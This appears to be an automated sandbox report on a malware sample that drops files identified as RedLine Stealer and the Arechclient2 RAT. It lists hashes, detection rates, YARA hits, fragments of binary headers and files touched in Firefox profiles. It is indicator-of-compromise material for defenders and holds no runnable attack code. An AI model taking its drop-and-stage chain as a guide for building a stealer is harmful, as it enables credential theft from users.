Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65% Antivirus: Virustotal, Detection: 61%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\d5c4eeb7

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.762278385224484
Encrypted:	false
SSDEEP:	24576:JL8X8agz3LJ/97RhYDqexjSsnzZySqrl0mfFcN5HC90vdb0icsSStMVADbgcjj/:eRCPneBtLmw5i90R2s4AP1jj/
MD5:	ADBB3C5CA658C7F824DDE7C6A40BA602
SHA1:	31F03EAFD2995BBCA8DFDDA6845B8E1471D9911D
SHA-256:	C0282BEB0B60736CEDD606FDF4C43E1C30F5CE4AC7963F29BD78D6C4101CA258
SHA-512:	81F0DCF7FE7DC45CF0AFA51E7866F03586273E9DF8EA4BE403DA15FF5EBE2519F14A6C78AF5E30BFE7E452D19F497C137F6DB5D2EBF5B78B67873FE644F5E927
Malicious:	false
Preview:	.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FP.............4>.. %../?..1"..20..f...3...)6..+"..20..3!.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..)...28../+..>Q.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..)...'%..("..(2..FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..........8..)"..2.......'<..)#..FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..t..sa.qQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.

C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3369
Entropy (8bit):	5.442189701509085
Encrypted:	false
SSDEEP:	96:gHuy5iSCSN1RlVcM2EPnP4P4P4P4PRPRPRc:wYSCSN1RlVcM2EPnP4P4P4P4PRPRPRc
MD5:	C9F00324A455E6BA62E15B8FB526ECF7
SHA1:	E300A02D2D7B50CD824007433720EA6F963634AC
SHA-256:	3B63876123AD02E1AB6FCC98B42862099AB0B0FC83F7077CB19D5C65F1056A55
SHA-512:	00D87046AA414E4AB0EBEA3E82D8C0861F92B5D2E2B0D0618BE1DFADF7CA4509293A46D2FDD02E77945FDAEF7AE8E1E80ECE52C7B365004EFEB80FD6150BE5F3
Malicious:	false
Preview:	[04/27/24 02:20:46] Main : OS Version = osWin10...[04/27/24 02:20:46] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/27/24 02:20:46] Installer Target URL request = {"IPAddress":"192.168.2.4","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/27/24 02:20:48] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/27/24 02:20:48] DownloadAndLaunchInstaller : Creating BITS download handler...[04/27/24 02:20:48] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/27/24 02:20:48] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/27/24 02:20:48] DownloadAndLaunchInstaller : Target folder ="C:\User

C:\Users\user\AppData\Local\Temp\kccglr

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 23:19:52 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.9965499076602775
Encrypted:	false
SSDEEP:	24:85EmC+0/h8tXRKgKI+6GzryE0yAKfCs2V3qyFm:8fCx/hQXRXxXdRGlyF
MD5:	115DA8A22D3E3D6EC2DB00DFDE0A9F2D
SHA1:	860F74798E7B0003B38528823CB498B9C408C7DA
SHA-256:	F305A14EEE8C195DD9B26A78FB666A292A961A1888ABD6C4AF88672A1D57D21E
SHA-512:	E1FF60BF1A76A938E6FFE871C961C48057B6680B6BD48604829346587F941F6C32AB2D4ABB658735031B9B45127F486EDF91ED1360BB630B0FDC852D20940B48
Malicious:	false
Preview:	L..................F.... ....Z.!....JO\|.8....Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&......vk.v....a..y8...Xkm.8.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[............................%..A.p.p.D.a.t.a...B.P.1......XY...Local.<......CW.^.X[.....b......................'..L.o.c.a.l.....N.1......Xw...Temp..:......CW.^.Xw.....l.....................M&..T.e.m.p.....T.1......X{...u3bs.2..>......Xw..X{....._...................... /.u.3.b.s...2.....V.2.0.%..X./ .run.exe.@......X./.X{..............................r.u.n...e.x.e......._...............-.......^...........p.by.....C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe......\.u.3.b.s...2.\.r.u.n...e.x.e.........\|....I.J.H..K..:...`.......X.......066656...........hT..CrF.f4... .u.T..b...,.......hT..CrF.f4... .u.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9.

C:\Users\user\AppData\Local\Temp\osssciedmed

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\osssciedmed, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\osssciedmed, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\osssciedmed, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65% Antivirus: Virustotal, Detection: 61%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\tmpC87D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Download File

Process:	C:\Users\user\Desktop\TNQTc6Qmkg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	294400
Entropy (8bit):	6.770967482619401
Encrypted:	false
SSDEEP:	3072:UHxuFIQ09pm10VCYK+6y8ctD8hrA9C56Mr62QBsfLlpqy7spozLI9K72q8VAXoDu:AImMZeCg2KYLjICzLIMfFoDof2K
MD5:	BB2810421305B969836433A1DFB11271
SHA1:	B539A84F42A3E07253BFC76AB2CC89DE6FDF6F7C
SHA-256:	84A11B7B44F40E21F2B778875BB6AF408A014EEB907FB846CBCC7EA73131CEFA
SHA-512:	94BC6848061595B7D2C78DD03CB488EB1C51CF53F372D725687353B47C6C601DD6D2470CF308720E556FA7D6160EA1185F034E75DB793C6BDD592DD3606A0963
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 39%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L...u.xd.....................:.......A.......0....@.................................]...........................................(........h...................`..\....2..8..............................@............0...............................text............................... ..`.rdata...l...0...n..................@..@.data....K.......r..................@....rsrc....h.......j..................@..@.reloc..\....`.......h..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u3bs.1.zip

Download File

Process:	C:\Users\user\Desktop\TNQTc6Qmkg.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3884863
Entropy (8bit):	7.9982714074161665
Encrypted:	true
SSDEEP:	98304:7goFFJ7lj6j1elkeoTNxPxDZhAryYACWcTIxlN+ba:7guJ7wpfTDPxD0P2YG
MD5:	78D3CA6355C93C72B494BB6A498BF639
SHA1:	2FA4E5DF74BFE75C207C881A1B0D3BC1C62C8B0E
SHA-256:	A1DD547A63B256AA6A16871ED03F8B025226F7617E67B8817A08444DF077B001
SHA-512:	1B2DF7BEE2514AEE7EFD3579F5DD33C76B40606D07DBA69A34C45747662FAD61174DB4931BCA02B058830107959205E889FEE74F8CCC9F6E03F9FD111761F4EA
Malicious:	false
Preview:	PK.........?.X........I......bunch.dat\]...:.... "...T.......N<wf..X $;.e..)....\|u]+...UV.~.....f.Rje.......@.f.r..V....J-.#U.....=.T..E.5.Z..&..z...'.k..%..Je.....[5.....P..B...@........G..z[.-B1....Jz#....%.J...j...W........>62.jK(...........E.T.Q}.j._I..R.TEj.>..O..:J%o.......`.f+O...W>.....S.INC.m.6..\|wQ.xk.K.....o.D....:.n4....P>..M._\|...P.R@.gW...k..X...MbM.....H....... .....#o.CC.!...1!R.g....Qc "P....Q.3.H.B.F.\|...)...........@..W.6..Z..7.9.....d'`_.6.zr%a......7.,...l....h.v......P.O.f..!..Y..#..Y.7..g..v=..k....J...N#\.5.....]......<.VGU.~....,..X.o.k..#..?v..%.0.+...m.(m..ah.JG>.....m..V......kb...B.jX...V$p... ..?.<....^...%KA=0\.(......Q.l>.;x..#W.@@.tIU ...Q............./e.7Ew..}h..^N... ........+.........bRz.........2r.f..u'o..s.}1...j.{.'%.......?..Z..M.....9.\|P..W.o...c...3....H\.4..B......;14.65.Q3....24$...2(..9j......!.$..<<....P#b..Lj.D.vG.+.}.T..6tR..b."..o.f...h>.......Z..5.(....]........

C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\Desktop\TNQTc6Qmkg.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18% Antivirus: Virustotal, Detection: 13%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u3bs.2\bunch.dat

Download File

Process:	C:\Users\user\Desktop\TNQTc6Qmkg.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Local\Temp\u3bs.2\relay.dll

Download File

Process:	C:\Users\user\Desktop\TNQTc6Qmkg.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe

Download File

Process:	C:\Users\user\Desktop\TNQTc6Qmkg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2469936
Entropy (8bit):	6.434916453080517
Encrypted:	false
SSDEEP:	49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
MD5:	9FB4770CED09AAE3B437C1C6EB6D7334
SHA1:	FE54B31B0DB8665AA5B22BED147E8295AFC88A03
SHA-256:	A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
SHA-512:	140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u3bs.2\whale.dbf

Download File

Process:	C:\Users\user\Desktop\TNQTc6Qmkg.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Users\user\AppData\Local\Temp\u3bs.3.exe

Download File

Process:	C:\Users\user\Desktop\TNQTc6Qmkg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4866096
Entropy (8bit):	6.542818068158205
Encrypted:	false
SSDEEP:	49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
MD5:	397926927BCA55BE4A77839B1C44DE6E
SHA1:	E10F3434EF3021C399DBBA047832F02B3C898DBD
SHA-256:	4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
SHA-512:	CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4% Antivirus: Virustotal, Detection: 3%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......\|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\bunch.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
File Type:	data
